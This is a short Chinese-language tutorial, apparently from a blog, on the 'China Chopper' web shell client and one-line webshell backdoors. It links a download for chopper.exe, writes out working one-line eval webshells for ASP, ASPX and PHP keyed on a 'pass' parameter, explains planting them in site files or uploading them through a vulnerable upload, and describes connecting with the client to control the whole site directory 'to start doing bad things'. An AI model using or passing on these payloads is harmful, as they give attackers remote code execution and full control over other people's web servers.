1. 程式人生 > >中國菜刀與一句話木馬

中國菜刀與一句話木馬

中國菜刀下載地址:   http://pan.baidu.com/share/link?shareid=871753024&uk=388464620

一.基本操作:

往目標網站中加入一句話木馬,然後你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網站目錄

二.實戰

asp的一句話是:

<%eval request ("pass")%>

aspx的一句話是:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

php的一句話是:

<?php @eval($_POST['pass']);?>

我們可以直接將這些語句插入到網站上的某個asp/aspx/php檔案上,或者直接建立一個新的檔案,在裡面寫入這些語句,然後把檔案上傳到網站上即可。

下面舉個小例子:


然後假設我們有個智障網站有這樣的漏洞:


我們把這個lubr.php上傳上去後,開啟chopper.exe


連線到這個網址下我們的菜刀檔案上,右鍵點選檔案管理,就可以獲取整個網站的目錄了~然後就可以開始做壞事。